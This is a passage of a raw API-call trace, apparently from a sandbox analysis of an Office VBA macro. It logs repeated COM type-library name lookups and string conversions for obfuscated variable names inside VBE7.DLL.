This=0x631b4c0, szNameBuf="_B_var_RAC4Qwc", lHashVal=0x101e64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.612] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.612] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.612] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RAC4Qwc", lHashVal=0x101e64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.612] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.612] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.612] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RAC4Qwc", lHashVal=0x101e64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.612] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.612] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.612] IUnknown:Release (This=0x665ba50) returned 0xd [0069.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8704ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_RAC4Qwc") returned 15 [0069.612] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RAC4Qwc", lHashVal=0x101e64, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x51003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x51003400000000, pDummy=0x0) returned 0x0 [0069.612] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81312 | out: _Dst=0x144ec0) returned 0x0 [0069.612] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.612] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.612] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.612] IUnknown:Release (This=0x665ba50) returned 0xd [0069.612] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.612] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.612] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.612] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.612] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.612] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.612] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.613] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.613] IUnknown:Release (This=0x665ba50) returned 0xd [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.613] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.613] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.613] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.613] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.613] IUnknown:Release (This=0x665ba50) returned 0xd [0069.613] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.613] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.613] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.613] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.613] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.613] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.613] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.613] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.613] IUnknown:Release (This=0x665ba50) returned 0xd [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.613] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.613] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.613] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.614] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.614] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.614] IUnknown:Release (This=0x665ba50) returned 0xd [0069.614] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.614] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.614] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.614] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.614] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.614] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.614] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.614] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.614] IUnknown:Release (This=0x665ba50) returned 0xd [0069.614] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.614] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.614] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.614] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.614] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.614] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.614] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.614] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.614] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.614] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.614] IUnknown:Release (This=0x665ba50) returned 0xd [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.615] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.615] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.615] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.615] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.615] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.615] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.615] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.615] IUnknown:Release (This=0x665ba50) returned 0xd [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.615] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81272, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="D_AoQAQ") returned 8 [0069.615] ITypeComp:RemoteBind (in: This=0x665ba60, szName="D_AoQAQ", lHashVal=0x1008db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81272, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="D_AoQAQ") returned 8 [0069.615] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="D_AoQAQ", lHashVal=0x1008db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81272, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="D_AoQAQ") returned 8 [0069.615] ITypeComp:RemoteBind (in: This=0x665bd30, szName="D_AoQAQ", lHashVal=0x1008db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.616] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D_AoQAQ") returned 0x1008db [0069.616] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="D_AoQAQ" | out: _Dst="D_AoQAQ") returned 0x0 [0069.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="D_AoQAQ") returned 8 [0069.616] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.616] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="D_AoQAQ", lHashVal=0x1008db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.616] IUnknown:Release (This=0x665ba50) returned 0xd [0069.616] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.616] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="D_AoQAQ", lHashVal=0x1008db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.616] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.616] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.616] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="D_AoQAQ", lHashVal=0x1008db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.616] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.616] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.616] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="D_AoQAQ", lHashVal=0x1008db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.616] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81272, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="D_AoQAQ") returned 8 [0069.616] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="D_AoQAQ", lHashVal=0x1008db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.616] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.616] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81272 | out: _Dst=0x67c2d40) returned 0x0 [0069.616] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_D_AoQAQ") returned 0x100c5f [0069.616] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_D_AoQAQ" | out: _Dst="_B_var_D_AoQAQ") returned 0x0 [0069.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_D_AoQAQ") returned 15 [0069.616] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.616] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_D_AoQAQ", lHashVal=0x100c5f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.616] IUnknown:Release (This=0x665ba50) returned 0xd [0069.617] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.617] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_D_AoQAQ", lHashVal=0x100c5f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.617] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.617] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.617] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_D_AoQAQ", lHashVal=0x100c5f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.617] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.617] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.617] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_D_AoQAQ", lHashVal=0x100c5f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.617] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.617] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.617] IUnknown:Release (This=0x665ba50) returned 0xd [0069.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8704fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_D_AoQAQ") returned 15 [0069.617] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_D_AoQAQ", lHashVal=0x100c5f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0) returned 0x0 [0069.617] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81272 | out: _Dst=0x144ec0) returned 0x0 [0069.617] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MAAQBC4D", lHashVal=0x106a3b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81362, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAQBC4D") returned 9 [0069.617] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MAAQBC4D", lHashVal=0x106a3b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81362, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAQBC4D") returned 9 [0069.617] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MAAQBC4D", lHashVal=0x106a3b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.617] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAAQBC4D") returned 0x106a3b [0069.617] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="MAAQBC4D" | out: _Dst="MAAQBC4D") returned 0x0 [0069.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="MAAQBC4D") returned 9 [0069.618] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.618] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MAAQBC4D", lHashVal=0x106a3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.618] IUnknown:Release (This=0x665ba50) returned 0xd [0069.618] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.618] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MAAQBC4D", lHashVal=0x106a3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.618] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.618] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.618] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MAAQBC4D", lHashVal=0x106a3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.618] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.618] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.618] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MAAQBC4D", lHashVal=0x106a3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.618] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81362, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAQBC4D") returned 9 [0069.618] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MAAQBC4D", lHashVal=0x106a3b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, 